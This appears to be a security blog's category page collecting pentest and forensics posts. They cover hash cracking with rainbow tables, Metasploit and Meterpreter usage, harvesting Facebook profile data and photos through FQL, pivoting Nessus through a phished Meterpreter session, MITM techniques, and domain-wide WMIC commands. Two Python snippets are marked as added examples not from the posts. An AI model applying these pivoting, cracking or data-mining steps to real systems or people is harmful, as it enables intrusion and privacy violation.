Recently in Security Category

Excellent Rainbow Tables Service


Last ShmooCon something wicked and evil happened. The fine folks on the PDC mailing list decided it would be a great idea to have a place at Shmoo where we could all meet up and share Rainbow Tables. What a grand idea! After all, good Rainbow Tables can easily go well into the hundreds of gigabits so why not have a nice get together and share?

Small problem. Everyone showed up with empty hard drives. No one, not a single person, brought any tables at all.

Zip.


[Image: Zip_disk.JPG. Caption: Almost as crappy]


Add to this the fact that my external hard drive with my Rainbow Tables crashed out on me last week. So, we now have two important lessons to take from the Rainbow Tables saga. Lesson one: no one is willing to share. Lesson two: backups are kind of important.

To remedy this situation I went to the fine people at Project Rainbow Crack and ordered a new set of tables for NT and LANMAN hashes. You may say that simply downloading them would be cheaper, and you would be right. However, we were in a bind on a current pen test and needed them immediately. Turns out it would be much faster to order them and have them shipped to us rather than download them.

I went to the section of the Project Rainbow Crack site to buy the tables and ordered the USD $300 set. What I would get is a new 320 GB hard drive and the 272 GB of tables for LM and NT hashes to go with it. What I was not expecting was that overnight air was included in the cost.

These guys simply rock. The service was excellent, and their packing... well, their packing was something to be seen to be believed.

As near as I could tell it was wrapped in bubble wrap, 4 years of newspaper compressed to 1" around the entire drive and the strongest tape known to man wrapped liberally around the drive.

First, I needed the right tools.

[Image: 2010-07-27 13.12.06.jpg. Caption: Hard Liquor Not Optional]

Finally, I was able to squeeze the box out and see what was sent to me. It was an external hard drive. No liquor to replenish my stock. It would have been better if there was alcohol in the package. For this reason, and this reason only, they get 4 out of 5 stars.


Everything was in its place. The tables, and the software to make them sing. I was a bit disappointed to see that only the programs for Windows were included. A bit of a bummer, but that is ok. There are plenty of places online to find Linux and OSX programs that work with the tables that were sent to me.

Oddly enough, the software was WinRAR protected with a password of "abcde12345". I am pretty sure this has something to do with crypto export controls. But it still made me chuckle.

How did they work? Beautifully. We were able to crack an Admin LANMAN password hash in under 5 min, and a NT only hash in under 15min.

When you get the tables there will be a couple of things that you will notice. First, the tables are in .rtc format. This is no big deal, except other tools like Cain and Abel will need the tables to be in .rt format. The fine folks at Project Rainbow Crack have a few excellent tools to convert the formats here.

I cannot recommend the product from the fine folks at Project Rainbow Crack enough. The drive is ok, the service was prompt and the tables worked.

Also, I am currently backing up the tables to two different drives.

Next year I will be bringing some tables to share.

There are currently a number of great sites that offer free tables. Below are just a few:

http://www.freerainbowtables.com/

http://ophcrack.sourceforge.net/tables.php

Before you come to Shmoo get some tables and bring them to share with everyone else.

We will not have a repeat from last year.

-strandjs

DEFCON Contest


While we aren't having a party this year, we are running a mini contest and offering up some tokens of appreciation for those who complete it. A badge of honor if you will...





http://www.badguywalmart.com

Let's be clear. The end objective of this game is to speak a phrase to Darren or Larry so that it can be overheard by others (the louder the better!) while showing us the "official" picture of the phrase. We don't care how you show us the picture, be it print or electronic, but we will not do any computing for you, or place any storage devices in our computers.

Badges are limited so solve it early! While they get you nothing but bragging rights, shouldn't you be packing for DEFCON?

Oh, and everything you need to get started is in this blog post.

Best of luck.

Metasploit's New GUI


A new GUI for Metasploit has been added tonight by ScriptJunkie to the Metasploit SVN repository. This new GUI is multi-platform and is based on Java; the NetBeans project for it can be found in the external/source/gui/msfguijava/ directory for those who want to contribute and have ninja skills with Java and user interfaces. The GUI can be run by invoking the msfgui script at the base of the Metasploit directory:

./msfgui

This script simply executes the following command:

java -jar `dirname $0`/data/gui/msfgui.jar

To be able to run this GUI, Java must be installed on the machine. When you run the command you should be greeted by the following splash screen followed by this user interface:


Note that the interface does not start an msfrpcd instance by itself, since it can also be used to connect to a remote msfrpcd session on another host. To start an msfrpcd session on a host so that you can connect to it remotely with msfgui, run the following command on that host:

./msfrpcd -S -U MetaUser -P Securepass -p 1337

We tell the msfrpcd daemon to start with SSL disabled (-S) since there is no support for it right now, we specify the user with the -U switch, the password with the -P switch and the port to listen on for inbound connections with the -p switch. The service will bind to the 0.0.0.0 address so it will listen on all interfaces; if you want it to bind to a specific interface, pass the IP address to bind to with the -a switch. When you run the command above the output should look something like this:

loki:msf3 cperez$ ./msfrpcd -S -U MetaUser -P Securepass -p 1337
[*] XMLRPC starting on 0.0.0.0:1337 (NO SSL):Basic...
[*] XMLRPC initializing...
[*] XMLRPC backgrounding...

Once it is up we just use the Connect to msfrpcd option in the File menu:


This will bring up the following screen

There we just enter the data we set up on our remote host; we can also start a new connection from this screen and even change the path for our Metasploit folder to another copy, if we wish, using the Change Path button.

To start a new session with the local copy just select the Start new msfrpcd option from the File menu; this will automatically start an msfrpcd session for you using the copy of Metasploit from which you launched msfgui. Once started we can then interact with it. Let's launch a multi handler to receive some Meterpreter connections:



Once we select the multi handler a screen will appear that will let us choose our payload; depending on the payload we will be able to set the parameters for it:



Once we have set the options needed for our shell we just hit Run Exploit to launch the job and it should appear in the jobs screen as shown below:


When the Meterpreter session is received and established it will appear in the Sessions window and we can interact with it.


To interact with our shell we can simply select it and left click on it to bring up the options of what we can do. One of the things I like about what is being done with the GUI is the way that the Meterpreter scripts were integrated as actions on the menu, with easy-to-understand groupings, alongside the most common commands.



Here is the screen we would see if we selected Windows Enumeration from the System Information menu; this launches the Winenum script and we can see its progress. We can even enter commands in the dialog box below and hit Submit to send a command to the Meterpreter session once the script is finished.



We can even access the server's file system and interact with it.




For pentesters, do check the Report feature under Post Exploitation for an HTML activity log of what was done in the shell and Meterpreter sessions. I invite you to play with the other options, modules and menu items and provide feedback, including bug reports and feature requests for stuff to add to the GUI. If you are a Java ninja you can provide patches and code, which is also welcome; you can do this at http://www.metasploit.com/redmine/projects/framework

Exploring the Facebook API


By Mark Baggett

The Ethical Hacker Challenges are always a lot of fun. They are usually wrapped in a creative and entertaining movie theme (as if hacking something wasn't entertaining enough) and always present an interesting technical challenge. I always learn something new with each new challenge.

Over the Christmas break I took some time to explore the Facebook API for the Miracle on Thirty-Hack Street Challenge. Here is some of what I learned about the Facebook API. First, let's get an API key.

Obtaining an API key
To develop applications for Facebook you'll need an API key. Getting an API key is very easy and only takes about 2 minutes. To obtain your key you need to add the "Developers" application to your Facebook account. You can do this by logging in with your Facebook account at the URL http://www.facebook.com/developers/. From there you create an application by clicking "Set up New Application", picking an application name and agreeing to the terms of use. You are then assigned an API key and a Secret key. If you are developing with an offline script such as Python or Perl, then under your application's "Advanced Settings" set your application up as a "Desktop" application. Then, armed with your API and Secret key, you are ready to get started.

Start Coding
While there are various options available, I really only want the ability to query Facebook data using FQL. FQL, or "Facebook Query Language", is a very SQL-like query language that allows you to extract data from Facebook. Perl's WWW::Facebook::FQL library is pretty simple to use and should provide the functionality I need. After installing the required Perl modules I threw together a small Perl script that allows me to do FQL queries from the command line.

To use this script you'll need to plug in your own API Key, Secret, Username and Password. The username and password that you provide in the script will be used to do the data mining and determines what access you have to the target's data. Here is my very simple script:

use strict;
use warnings;
use WWW::Facebook::FQL;
## Connect and log in:
## key is the Application Key obtained from your Facebook profile by adding the "Developers" app and creating an application.
## private is the "Secret" from that same application.
my $fb = new WWW::Facebook::FQL key => 'API KEY HERE', private => 'API SECRET KEY HERE';
## This is the account we will use to do the data mining. The more connections you have to the target (Friend, Friend of Friend, Networks, etc.) the more information you will have access to.
$fb->login('facebook login name', 'facebook password');
## If the user passed XML or JSON (or garbage) as the 2nd parameter, set the response format to that.
if ($ARGV[1]) { $fb->format = $ARGV[1] }
## Do a query (the 1st parameter) and print the results:
print $fb->query($ARGV[0]);
## Release the session.
$fb->logout;

Using this script we can execute FQL queries from the command line like this:

markbaggett@ubuntu:~$ perl fql.pl "Select name from user where uid=<target facebook ID #>"

This will return an XML response containing the user's name for the targeted Facebook ID #. You can determine a target's Facebook ID # by looking at the web interface and simply hovering over a wall post or a picture. If the URL is something like this... http://www.facebook.com/profile.php?id=11223344556677 then their ID would be 11223344556677. Since we can issue FQL commands from the command line we can do more advanced things, like downloading all the user's photos with a single command:

markbaggett@ubuntu:~$ for i in `perl fql.pl "Select src_big from photo where aid IN (SELECT aid FROM album WHERE owner=facebookID#)"| grep "src_big" | cut -d ">" -f2 | cut -d "<" -f1`; do curl -C - -O "$i"; done

Or display all data available on the account in the user table like this...

markbaggett@ubuntu:~$ perl fql.pl "select uid, first_name, last_name, name, pic_small, pic_big , pic_square, pic, affiliations, profile_update_time, timezone, religion, birthday, birthday_date, sex, hometown_location, relationship_status, significant_other_id, political, current_location, interests, is_app_user, music, tv, books, about_me, education_history, work_history, notes_count , wall_count, status, is_app_user, online_presence, locale, proxied_email, profile_url, pic_small_with_logo, allowed_restrictions, profile_blurb, family from user where uid="facebookID#"

Or dump all photo albums...

markbaggett@ubuntu:~$ perl fql.pl "select aid, owner, cover_pid, name, created, modified, description, location, size, link, visible, modified_major, edit_link, type, object_id from album where owner=facebookID#"

Or if for some reason we needed to extract the notes fields from an account and try every word in the notes as a password to a PGP encrypted PDF we could do something like this...

markbaggett@ubuntu:~$ for i in `perl fql.pl "Select content from note where uid= 100000565751882"`; do echo "$i" | gpg --passphrase-fd 0 --decrypt JudgeHenryLetter.pdf.gpg && echo "$i is the password" ; done

(If you missed it, that one line solves the Christmas Ethical Hackers Challenge)
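The commands above pull fields out of the XML that fql.pl prints by piping through grep and cut, which breaks as soon as a field spans a line or contains angle brackets. Here is an added example (not from the post) that parses the response as XML instead; the two sample responses are constructed, and their shape (a namespaced fql_query_response holding one element per row, and an error_response with error_code and error_msg) is an assumption about the FQL reply format.

```python
"""Parse FQL XML responses properly instead of grep | cut."""
import xml.etree.ElementTree as ET

FB_NS = "http://api.facebook.com/1.0/"

# Constructed sample of what "Select src_big, caption from photo ..." returns (assumed shape).
SAMPLE_PHOTO_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<fql_query_response xmlns="http://api.facebook.com/1.0/" list="true">
  <photo>
    <src_big>http://photos.example.test/1_b.jpg</src_big>
    <caption>Beach trip &lt;2009&gt;</caption>
  </photo>
  <photo>
    <src_big>http://photos.example.test/2_b.jpg</src_big>
    <caption/>
  </photo>
</fql_query_response>"""

# Constructed sample of an API error reply, e.g. after the session expired (assumed shape).
SAMPLE_ERROR_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<error_response xmlns="http://api.facebook.com/1.0/">
  <error_code>102</error_code>
  <error_msg>Session key invalid or no longer valid</error_msg>
</error_response>"""


class FqlError(Exception):
    """Raised when the API answered with an error_response instead of rows."""


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on every tag."""
    return tag.split("}", 1)[1] if tag.startswith("{") else tag


def fql_rows(xml_text):
    """Return the rows of an FQL XML response as a list of {field: text} dicts."""
    root = ET.fromstring(xml_text)
    if _local(root.tag) == "error_response":
        code = root.findtext("{%s}error_code" % FB_NS, default="?")
        msg = root.findtext("{%s}error_msg" % FB_NS, default="")
        raise FqlError("FQL error %s: %s" % (code, msg))
    # Each child of the response is one row; each grandchild is one selected field.
    return [{_local(f.tag): (f.text or "") for f in row} for row in root]


def fql_column(xml_text, field):
    """Pull one field from every row, skipping rows where it is empty (e.g. <caption/>)."""
    return [r[field] for r in fql_rows(xml_text) if r.get(field)]


if __name__ == "__main__":
    # Equivalent of the grep "src_big" | cut ... pipeline from the post, but XML-aware.
    for url in fql_column(SAMPLE_PHOTO_RESPONSE, "src_big"):
        print(url)
```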

A full list of all the Facebook tables and fields is available here.

Now, you cannot simply use this to pull any data you want from a Facebook account. The information returned depends upon the permissions granted by the user to the account used in your script. Users who share information with "EVERYONE" allow you to use this script and retrieve all their data. Granting access to "EVERYONE" is most often the default for data posted to Facebook accounts, so the script will most likely return pretty good results. Users may have changed the defaults and only granted access to "Friends" or "Friend of a Friend". In those cases, you would need the target OR a friend of the target to accept your friend request. The Facebook API returns data based upon the permissions of the data element itself and not of the data element's container object. So, if a user restricts access to the "NOTES" tab in Facebook to "ONLY FRIENDS" but a notes entry is set to allow access to "EVERYONE", then the note will NOT be accessible through the web interface, but it will be accessible via the API. Also, in some circumstances anonymous unauthenticated users can access photos from a user's account even when the photo object has permissions set to "Only Friends". More on that to come later. Of course, none of this should be used to violate anyone's privacy or in violation of Facebook's terms of use.

Thanks to Ed and Kevin for all their work putting together the challenge. I always learn something new with every Ethical Hacker Challenge. Congratulations to all the other winners and honorable mentions. It looks like several people did some really awesome work and I don't envy Ed and Kevin's job in sorting through all the entries to choose a winner. But, I do appreciate the choice they made. :)

Eugenio Delfa made this AWESOME video and wrote some great Python scripts to do Facebook extracts. I found a copy of his scripts here. His scripts are great and I will probably use them rather than my own in the future.

JOIN MARK BAGGETT FOR SANS 504 IN RALEIGH NC JUNE 21-26 CLICK HERE TO SIGN UP

Building the CCDC Badge System


Two weeks ago, some of the PaulDotCom crew spent a couple of days down in Maryland hanging out with all of the great CCDC crew. While Paul and Darren played Red Team for the Mid-Atlantic Collegiate Cyber Defense Challenge, I got to play "the badge man".

It was my job to design and implement a physical access control system and conference badges that were "in scope" for the Red Team to attack and the Blue Team to defend. Ultimately I wanted the badge to be RFID enabled and have a form factor similar to those found in industry. I also wanted them to be easy to transport and reproducible for those on student budgets. In that spirit, I'm here to spill my guts about the system, hardware and code so that you too can make this part of your cyber challenge.

The Hardware:

The hardware is quite simple. It uses:

  • A Parallax RFID Reader
  • An Arduino (ATMEGA 328)
  • Red and green LEDs - many sources, such as Radio Shack
  • Various lengths of wire
  • A project enclosure of your choosing

The badges feature laser cut acrylic (thanks to the AS220 FabLab), and Q5 RFID tags rewritten and in EM4X02 emulation mode. While we wanted to provide an RFID reader/writer for each participant, the cost became prohibitive. Instead we had some hardware that featured the ACG Dual ISO OEM Module. Our module was sourced from Adam Laurie, author of RFIDIOt, which was used to read and write the Q5 RFID tags.

[Image: badgerb.jpg. Caption: Red and Blue Team badges, minus the RFID card]

The Code:

Darren the intern and I spent the better part of two weeks battling code to get this to work, especially given that we were trying to compare two different variable types, and a host of other issues. What we did find was that part of the problem had already been tackled before. The read-and-compare against a list of known values worked, but much of the rest of the code did not. The part that didn't work we knew how to fix, so we used that as the base for the system. Once that was complete, it was as simple as providing some feedback to the user that a badge read failed or succeeded.

Basically, the code takes input from the reader and compares it to a list of values. If it finds a match, it turns the green LED on for 3 seconds, continues to compare to the end of the list and then waits for another badge and illuminates the red LED. If it doesn't match, it turns off the red LED for 1 second and then illuminates it again. Green means go, red means stop.

[Image: IMG_1002.png. Caption: An installed reader]

The Docs:

I also presented some information about the badge and some rules before the contest started. Those slides can be found here. Additionally, I did a wrap up of all of the ways I thought of to hack the badge system. Those slides can be found here.

[Image: scott.jpg. Caption: This physical security is better...]

Oh, I bet you want some other goodies! This file contains all of the code, lists of all of the RFID tag values, as well as wiring diagrams in image and Fritzing format.

Any and all feedback is welcome. E-mail me at larry@pauldotcom.com, or send me a note on Twitter to @haxorthematrix.

Enjoy!

Nessus Scanning through a Metasploit Meterpreter Session


By Mark Baggett

Scenario: You are doing a penetration test. The client's Internet face is locked down pretty well. No services are exposed externally and only HTTP/HTTPS are allowed OUT of the corporate firewall. You send in a carefully crafted email with Meterpreter attached. An accommodating user is more than happy to click your attachment, giving you Meterpreter access to their machine. Now what? How about using Nessus to scan all the services on their internal network? Here is a tutorial on how to do it.

The Players
Attacker 172.16.186.132
Victim 172.16.186.126

Step 1 - After you have Meterpreter access, install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy Aussie and all around smart guy, did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.

Step 2 - After you've installed OpenSSH and set up your account, use Meterpreter's PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:

meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22

This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).

Step 3 - SSH into the portfwd port you just created and set up a dynamic port forwarder on your machine. For example:

# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132

This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.

Step 4 - Use proxychains to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

# proxychains /usr/sbin/nessusd -D

Step 5 - Start the Nessus client and do your scan.

If you're not familiar with proxychains be sure to check out the post from last week.

Here is a video demo:

Nessus Scan through a Meterpreter Session from PaulDotCom on Vimeo.

Mark Baggett is teaching SANS 504 in Raleigh NC June 21st! Click here for more information.

Killing the Monkey in the Middle

There are many ways for an attacker to insert themselves in the middle of a conversation. Just some of the tools at the attacker's disposal include:

• DNS Cache Poisoning (metasploit)
• NetBIOS name spoofing (nbtool at skullsecurity.org)
• Lie about the DNS, WINS and/or default gateway with a rogue DHCP server (yersinia, ettercap)
• Deliver a WPAD file or otherwise reconfigure the browser proxy (metasploit)
• IPv6 ISATAP spoofing
• Attack routing protocols, such as BGP MITM
• IP source routing attacks (netcat)
• ICMP Redirect messages (ettercap)
• ARP Cache Poisoning (yersinia, ettercap, cain)
• Switch Port Stealing (ettercap)
• Layer 2 MAC Flooding* (yersinia, macflood, macof)
• Gratuitous Spanning Tree BPDU Root messages* (yersinia)
* Allows sniffing that leads to MITM

Some of these attacks work across the Internet, but most of them are limited to the LAN and rely on Layer 2. The good news is that many of these attacks can be mitigated with features available in the latest versions of Cisco's IOS (12.2 or better). BPDU Guard, DHCP Snooping, DHCP Snooping + Dynamic ARP Inspection, DHCP Snooping + IP Source Guard, ARP rate limiting, MAC address port security, PVLAN protected, isolated, community and promiscuous ports, and 802.1X can all be used to effectively limit many of these attacks. Listener Brian Almond (Infosec Samurai) submitted this PDF on Layer 2 security. Give it a gander! Nice work Brian.

Download Brian Almond's paper here

Other resources

http://isc.sans.org/diary.html?storyid=7567

http://www.ciscopress.com/articles/article.asp?p=1181682

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/dhcp.html

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/dynarp.html

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/bcastsup.html

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/port_sec.html

Mark Baggett is teaching SANS 504 in Raleigh NC June 21st! Click here for more information.

Links between forensics and pen tests

Last year on the show, Marcus J. Carey presented a tech segment about using memory analysis in penetration tests. Memory acquisition came into its own for incident responders a few years back. Even before tools like Volatility, Memoryze or HBGary's Responder were available, many incident responders, including me, used the strings command to perform rudimentary searches and "analysis" of memory artifacts.

[Image: Linux_strings.png] Figure 1: strings output of a Linux VM's memory image. The highlighted "forensics" happens to be the root password.

Shortly after Carey's presentation, DarkOperator posted a Meterpreter script that would dump memory and save it offline for later analysis. Passwords are a high value memory artifact for penetration testers. As someone working in app sec and incident response, Carey got me thinking about other things that forensics practitioners may find commonplace but that may be overlooked by penetration testers. Both disciplines inform each other.

Let's say you're a penetration tester (or an Amortized Perennial Threat, as Shawn Moyer says he is) and you're working for a client who wants you to go beyond the shell. Your client has requested that you go after important company data. Databases are an obvious target, but companies also have critical information floating around in Microsoft Office documents (e.g. business plans, bid contracts, vulnerability remediation tracking information, etc.).

What is the best way to locate these documents? You could manually navigate the various common directories where people store documents, read the directory listings and copy down those files that look interesting. But this is a labor intensive process and you may miss something if the user has tucked important files in odd locations.

If only there were a place on the file system that held information about files, a place where we could look and see all of the files that had been opened on the system and that would map back to the location of those files, even if those files were on network shares or removable media. Fortunately for us, there is such a location; in fact, there are two well known ones.

Windows systems have a feature that creates shortcuts for common document types, including Office files, when those files are opened by a user. The idea of using these shortcuts during a pen test is not new. In fact, it was mentioned before on Security Focus' Pen-Test mailing list, but I don't believe it's been, ahem, weaponized until now.

These shortcuts or link files are created by Windows to facilitate the "Recent" document features of modern Windows operating systems. For Windows XP the default location for link files is under Documents and Settings\<username>\Recent, with Microsoft Office files having their own location in Documents and Settings\<username>\Application Data\Microsoft\Office\Recent\. Vista and later versions of Windows have moved the recent link files to Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\ and Users\<username>\AppData\Roaming\Microsoft\Office\Recent. There may be other locations specific to other applications as well.

For the two common locations, I have created a Meterpreter script port of Harlan Carvey's lslnk.pl, which is commonly used by forensics analysts to dump the contents of Windows .lnk files.

dumplinks.rb can be used with Meterpreter to dump the contents of Windows .lnk files either to the Metasploit user's local file system or to the console. By default, dumplinks.rb runs in a less verbose mode than Carvey's lslnk.pl: it reports only the time stamps of the .lnk files themselves, then the time stamps contained within the .lnk files (which are time stamps for the target file), and finally the target file's location.

Enough drivel, here are a couple of screen shots:
[Image: dumplinks.rb-help.png] Figure 2: dumplinks help screen

And one of the script in action, dumping to the console:
[Image: dumplinks.rb-e.png] Figure 3: dumplinks sending everything to the console

Of course there are other tools and techniques that cross over from forensics to penetration testing. I will be back with another as soon as I can find the time. For now, enjoy dumplinks.

Dave Hull describes his working life as on the Venns between incident response, forensics and web application security. He will be teaching SANS Forensics 508: Computer Forensics Investigation and Incident Response in Boston, March 15 - 20
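As an added example (not the post's dumplinks.rb or Carvey's lslnk.pl), here is a minimal Python parser for the parts of the Shell Link format that dumplinks reports: the target's creation, access and write FILETIMEs from the 76-byte link header, and the target's local path from the LinkInfo block. The .lnk it parses is constructed inline by build_sample_lnk() (header and LinkInfo only) so that it runs offline; a real link usually also carries an ID list and string data, which this parser skips or ignores.

```python
"""Minimal Windows Shell Link (.lnk) parser, in the spirit of lslnk.pl / dumplinks.rb."""
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
HEADER_SIZE = 0x4C                    # fixed ShellLinkHeader size
HAS_LINK_TARGET_ID_LIST = 0x01        # LinkFlags bit: an IDList follows the header
HAS_LINK_INFO = 0x02                  # LinkFlags bit: a LinkInfo block is present
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01  # LinkInfoFlags bit: LocalBasePath is present


def filetime_to_datetime(ft):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime; 0 means 'not set'."""
    return None if ft == 0 else FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime, using integer arithmetic so it round-trips exactly."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_lnk(data):
    """Return link flags, the target's timestamps/size and its local path from a .lnk blob."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    # Offsets 0x14..0x38: LinkFlags, FileAttributes, CreationTime, AccessTime, WriteTime, FileSize
    flags, attrs, ctime, atime, wtime, size = struct.unpack_from("<IIQQQI", data, 0x14)
    info = {
        "flags": flags,
        "attributes": attrs,
        "target_created": filetime_to_datetime(ctime),
        "target_accessed": filetime_to_datetime(atime),
        "target_written": filetime_to_datetime(wtime),
        "target_size": size,
        "target_path": None,
    }
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # skip IDListSize + IDList
    if flags & HAS_LINK_INFO:
        info_size, _hdr_size, info_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, pos)
        if info_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
            start = pos + base_off                  # LinkInfo offsets are relative to its start
            end = data.index(b"\x00", start)        # LocalBasePath is a NUL-terminated ANSI string
            info["target_path"] = data[start:end].decode("latin-1")
        pos += info_size
    return info


def build_sample_lnk(target_path, created, accessed, written):
    """Construct a minimal well-formed .lnk (header + LinkInfo). Sample data, not a real link."""
    clsid = bytes.fromhex("0114020000000000c000000000000046")  # the ShellLink class id
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, clsid, HAS_LINK_INFO, 0x20,
                         datetime_to_filetime(created), datetime_to_filetime(accessed),
                         datetime_to_filetime(written), 4096, 0, 1, 0, 0, 0, 0)
    # VolumeID: size, DriveType (3 = fixed), serial number, label offset, empty label
    volume_id = struct.pack("<IIII", 17, 3, 0x1234ABCD, 16) + b"\x00"
    path = target_path.encode("latin-1") + b"\x00"
    base_off = 28 + len(volume_id)          # 28-byte LinkInfo header, then VolumeID, then path
    suffix_off = base_off + len(path)       # empty CommonPathSuffix (a single NUL) at the end
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 28, VOLUME_ID_AND_LOCAL_BASE_PATH,
                            28, base_off, 0, suffix_off) + volume_id + path + b"\x00"
    return header + link_info


def sample_report():
    """Build the constructed sample link and parse it back."""
    utc = timezone.utc
    blob = build_sample_lnk(r"C:\Documents and Settings\alice\My Documents\bid contract.doc",
                            datetime(2010, 2, 1, 9, 30, tzinfo=utc),
                            datetime(2010, 2, 10, 17, 45, tzinfo=utc),
                            datetime(2010, 2, 3, 11, 0, tzinfo=utc))
    return parse_lnk(blob)


if __name__ == "__main__":
    for key, value in sample_report().items():
        print("%-16s %s" % (key, value))
```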

After listening to Larry's excellent technical segment on dumping the event logs from a large list of computers, I decided to try it out on my own. If you missed the technical segment, you can find the notes here. To do my own testing I needed to start with a large list of computers. For my list, I want to have the names of every computer in the domain. So I turned to "dsquery computer" to get a list of all computers.

C:\WINDOWS> dsquery computer

"CN=CONTROLER1,OU=Domain Controllers,DC=subdomain,DC=domain,DC=com"

BLA BLA BLA... Truncated

"CN=WORKSTATION1,OU=ORGUNIT1,OU=OrgUnit2,OU=OrgUnit3,DC=Subdomain,DC=Domain,DC=com"

BLA BLA BLA... Truncated again

The length of the results changes because of the variable number of subdomains, but fortunately for us the workstation name is always the first part of the string. It is always between the CN= and the first comma. We can strip out the workstation name with the "DELIMS" and "TOKENS" options of the FOR loop. Also, by default DSQUERY will only return the first 100 results. This can be changed using the "-LIMIT" option. Setting the LIMIT to 0 returns all results. For now let's check our output looking at only two entries.

C:\WINDOWS>for /F "delims=, tokens=1" %i in ('dsquery computer -limit 2') do echo %i

C:\WINDOWS>echo "CN=WORKSTATION1
"CN=WORKSTATION1

C:\WINDOWS>echo "CN=WORKSTATION2
"CN=WORKSTATION2

We are almost there. I need to strip the first 4 characters of the line. For this I stole a page or two from Ed Skoudis' playbook. We can strip the first four characters with the SET command using the expression variable=%variable:~4%. But, since we are in a FOR loop we have to turn on delayed variable expansion and use ! instead of %.

C:\WINDOWS>cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 2') do set name=%i  & set name=!name:~4! & echo !name!"

Dsquery has reached the specified limit on number of results to display; use a different value for the -limit option to display more results.

C:\WINDOWS>set name="CN=WORKSTATION1    & set name=!name:~4!   & echo !name!
WORKSTATION1

C:\WINDOWS>set name="CN=WORKSTATION2    & set name=!name:~4!   & echo !name!
WORKSTATION2

Now we have all the computer names in the domain being printed one at a time. I can dump all the names of the machines in the domain to a file to feed Larry's event dumper.

C:\WINDOWS>cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 0') do set name=%i & set name=!name:~4! & echo !name! >> c:\temp\machines.txt"

Better yet, we could combine it with a WMIC command and other commands to do various useful tasks on our machines. For example, if I want to query every machine in my network for an instance of a process that starts with CMD I could run the following (remember that % is a wildcard in WMIC):

C:\WINDOWS>cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 2') do set name=%i  & set name=!name:~4! & wmic /node:!name! process where "name like 'cmd%'" list brief"

Dsquery has reached the specified limit on number of results to display; use a different value for the -limit option to display more results.

C:\WINDOWS>set name="CN=WORKSTATION1    & set name=!name:~4!   & wmic /node:!name! process where "name like 'cmd%'" list brief
HandleCount  Name     Priority  ProcessId  ThreadCount  WorkingSetSize
33           cmd.exe  8         2308       1            1654784

C:\WINDOWS>set name="CN=WORKSTATION2    & set name=!name:~4!   & wmic /node:!name! process where "name like 'cmd%'" list brief
HandleCount  Name     Priority  ProcessId  ThreadCount  WorkingSetSize
33           cmd.exe  8         2368       1            1626112

So there you go. Now using this basic syntax...

cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 0') do set name=%i  & set name=!name:~4! & Any command here based on !name!

... you can run any command you want on every machine in your domain.

Join me for SANS 504 June 21-26

    Memory Analysis


    What am I talking about? I am talking about RAM!

    Here are some of the things we can get from RAM: processes, network connections, open files, and encryption keys (for example, BitLocker keys).

    The last one, BitLocker encryption keys, is covered in an awesome presentation by Jesse Kornblum on how to recover the keys from memory; check it out: http://jessekornblum.com/presentations/omfw08.pdf

    There are some great tools for acquiring memory. You can use win32dd.exe, which will create a raw image file as well as write an MD5 hash of the output file you create.

    My personal favorite, though, is Memoryze from Mandiant. You can find it as a free download at http://www.mandiant.com. The cool thing about Memoryze is that you can run enumeration tools to give you process information, the registry keys being used by a process, which DLLs are loaded, the drivers loaded in memory, etc. The great thing about this is that you can do it either against an image it can enumerate from or on a live machine.

    Here is how it works:

    Open a command shell (cmd.exe) and change directories to where you installed Memoryze.

    Type "MemoryDD.bat". It will create a directory called audits where it will put your memory image, or,

    to write the image to a specific directory, type "MemoryDD.bat -output <directory_name>".

    [Screenshot: MemoryDD.bat output]

    To identify all open ports and their processes and process IDs, type "Process.bat -ports true".

    The output is in XML format:

    [Screenshot: Process.bat -ports true output]

    Notice above that the process forcefield.exe, process ID 900, is making a connection out to IP address 68.142.101.68 on port 80. This is simply a great way to tell what process is doing what (i.e., malware outbound connections).

    Now suppose you wanted to look for rootkits in memory. You can use Mandiant's HookDetection.bat file. This executes RootkitAudit.Batch.xml, which identifies hooks in kernel memory that are often used to subvert the integrity of the system. So you can see below the different processes and how they relate to the kernel, drivers, etc.

    [Screenshot: HookDetection.bat output]

    Notice above that you can see the module that has hooks into the kernel, i.e. 1394BUS.sys, where it is located (\windows\system32\drivers\) and a description of it ("Driver").

